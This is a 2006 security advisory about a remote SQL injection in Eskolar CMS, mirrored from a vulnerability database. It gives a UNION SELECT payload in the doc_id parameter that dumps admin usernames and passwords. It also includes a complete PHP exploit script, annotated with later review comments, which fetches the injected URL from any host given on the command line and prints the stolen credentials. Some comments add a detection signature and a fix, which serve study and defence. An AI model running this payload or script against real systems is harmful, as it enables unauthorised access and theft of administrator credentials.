securityvulnsSecurityvulnsSECURITYVULNS:DOC:14394

Eskolar CMS Remote Sql Injection

2006-09-23 00:00:00
vulners.com

Hello,

Eskolar CMS Remote Sql Injection

Discovered By : HACKERS PAL
Copyright : HACKERS PAL
Website : http://www.soqor.net
Email Address : [email protected]

Remote SQL injection:
/index.php?gr_1_id=0&gr_2_id=0&gr_3_id=1&doc_id=10%20union%20select%201,2,3,4,5,6,7,8,password,10,11,12,13,14,15,16,user,18,19,20,21,22,23,24,25,26%20FROM%20esa_admin_user/*

Exploit:
#!/usr/bin/php -q -d short_open_tag=on
<?
// Proof-of-concept for the Eskolar CMS doc_id SQL injection described in the
// advisory above. NOTE(review): this listing is as rendered by the hosting
// site: the asterisks of the /* ... */ banners were stripped, and from
// get_page() onward the code is HTML-entity encoded (`&#40;` for `(`,
// `&quot;` for `"`, `&#92;` for `\`). It is a record of the issue, not a
// runnable file as shown. The `<?` short tag relies on the
// `-d short_open_tag=on` option in the shebang line.
/*
/* Eskolar CMS Remote sql injection exploit
/* By : HACKERS PAL
/* WwW.SoQoR.NeT
/
print_r('
/
/
/
Eskolar CMS Remote sql injection exploit /
/
by HACKERS PAL <[email protected]> /
/
site: http://www.soqor.net /');
// Argument check: argv[1] is the base URL of the installation (see the
// Example in the usage text); without it the usage banner is printed and
// the script exits.
if ($argc<2) {
print_r('
/
/
/
Usage: php '.$argv[0].' host
/
Example: /
/
php '.$argv[0].' http://localhost/eskolar/
/
***/
');
die;
}
// Every PHP warning/notice is suppressed for the rest of the run, so a
// fetch that fails (unreachable host, allow_url_fopen disabled, ...) gives
// no diagnostic beyond the generic "[-] Exploit Failed" message near the
// end of the script. max_execution_time 0 removes the CLI time limit;
// socket reads time out after 5 s.
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

$url=$argv[1];
// The payload from the advisory: doc_id is evidently used unescaped in a
// 26-column SELECT, so a UNION SELECT places the `password` (column 9) and
// `user` (column 17) values of esa_admin_user into fields the page renders;
// the trailing /* comments out whatever follows in the original query.
// Defender note: a UNION SELECT ... FROM esa_admin_user inside the doc_id
// parameter of index.php is the request-side signature to alert on, and the
// application-side fix is to validate doc_id as an integer (cast or bound
// parameter) before it reaches the query.
$exploit="/index.php?gr_1_id=0&gr_2_id=0&gr_3_id=1&doc_id=10%20union%20select%201,2,3,4,5,6,7,8,password,10,11,12,13,14,15,16,user,18,19,20,21,22,23,24,25,26%20FROM%20esa_admin_user/*";
// Full request URL: base URL given on the command line plus the payload path.
$page=$url.$exploit;
/**
 * Fetch the body of $url as a string.
 *
 * Uses file_get_contents() when that function exists, otherwise falls back
 * to an fopen()/fread() loop that appends 1024-byte chunks to $contents.
 * NOTE(review): on the fallback path the fopen() result is not checked and
 * $contents is never initialised; combined with error_reporting(0) above, a
 * failed fetch silently yields an empty result rather than an error. Reading
 * an http:// URL this way depends on allow_url_fopen being enabled.
 * (Listing is HTML-entity encoded by the hosting site: `&#40;` is `(`,
 * `&quot;` is `"`.)
 *
 * @param string $url absolute URL to read
 * @return string|false|null page body; false/empty when the fetch failed
 *                           (the return value is not checked by the caller)
 */
Function get_page($url)
{

              if&#40;function_exists&#40;&quot;file_get_contents&quot;&#41;&#41;
              {

                   $contents = file_get_contents&#40;$url&#41;;

                      }
                      else
                      {
                          $fp=fopen&#40;&quot;$url&quot;,&quot;r&quot;&#41;;
                          // Loop ends on the first falsy chunk (EOF, read error, or a chunk equal to "0").
                          while&#40;$line=fread&#40;$fp,1024&#41;&#41;
                          {
                           $contents=$contents.$line;
                          }


                              }
                   return $contents;
     }
     // Global callback counter read and incremented by get() below:
     // 0 on the first match printed, greater than 0 afterwards.
     $i=0;

     /**
      * preg_replace_callback() callback: prints capture group 1 of a match.
      *
      * The first invocation (global $i == 0) labels the trimmed value
      * "User Name" and bumps $i; every later invocation labels it
      * "Pass Word". The caller discards preg_replace_callback()'s result, so
      * this function exists only for its echo side effect.
      *
      * @param array<int, string> $var match array from preg_replace_callback()
      * @return null no explicit return value
      */
     function get&#40;$var&#41;
     {
      GLOBAL $i;
       $var[1]=trim&#40;$var[1]&#41;;
      if&#40;$i==0&#41;
      {
      Echo &quot;&#92;n[+] User Name : &quot;.$var[1];
     $i++;
      }
      else
      {
      Echo &quot;&#92;n[+] Pass Word : &quot;.$var[1];
              }


     }

 // Fetch the page for the injected URL built above ($page is reused: URL in,
 // body out).
 $page = get_page&#40;$page&#41;;

 // Both markers must be present in the response, otherwise the run is
 // reported as failed: a red (#FF0000) table row containing a centered div,
 // and a td holding a target="_blank" link. The patterns are HTML-entity
 // encoded in this listing (`&#40;` for `(`, `&lt;` for `<`, `&#92;` for `\`).
 if&#40;!preg_match&#40;&#39;/&#92;&lt;tr bgcolor=&#92;&#39;#FF0000&#92;&#39;&gt;&lt;td&gt;&lt;div align=&#92;&#39;center&#92;&#39;&gt;&#40;.+?&#41;&lt;&#92;/div&gt;&lt;&#92;/td&gt;&lt;&#92;/tr&gt;/is&#39;,$page&#41;||!preg_match&#40;&#39;/&#92;&lt;td&gt;&lt;a href=&#92;&quot;&#40;.+?&#41;&#92;&quot; target=&#92;&quot;_blank&#92;&quot;&gt;&#40;.+?&#41;&lt;&#92;/a&gt; &lt;&#92;/td&gt;/is&#39;,$page&#41;&#41;
 {
          Die&#40;&quot;&#92;n[-] Exploit Failed&#92;n/* Visit us : WwW.SoQoR.NeT                   */&#92;n/**********************************************/&quot;&#41;;
 }

 // Each preg_replace_callback() is used purely for its side effect: get()
 // echoes capture group 1 of every match (the first as User Name, the rest
 // as Pass Word); the rewritten string it returns is discarded.
 preg_replace_callback&#40;&#39;/&#92;&lt;tr bgcolor=&#92;&#39;#FF0000&#92;&#39;&gt;&lt;td&gt;&lt;div align=&#92;&#39;center&#92;&#39;&gt;&#40;.+?&#41;&lt;&#92;/div&gt;&lt;&#92;/td&gt;&lt;&#92;/tr&gt;/is&#39;,&#39;get&#39;,$page&#41;;

 preg_replace_callback&#40;&#39;/&#92;&lt;td&gt;&lt;a href=&#92;&quot;&#40;.+?&#41;&#92;&quot; target=&#92;&quot;_blank&#92;&quot;&gt;&#40;.+?&#41;&lt;&#92;/a&gt; &lt;&#92;/td&gt;/is&#39;,&#39;get&#39;,$page&#41;;

 // Unconditional exit with the closing banner.
          Die&#40;&quot;&#92;n/*       Visit us : WwW.SoQoR.NeT             */&#92;n/**********************************************/&quot;&#41;;

?>
#WwW.SoQoR.NeT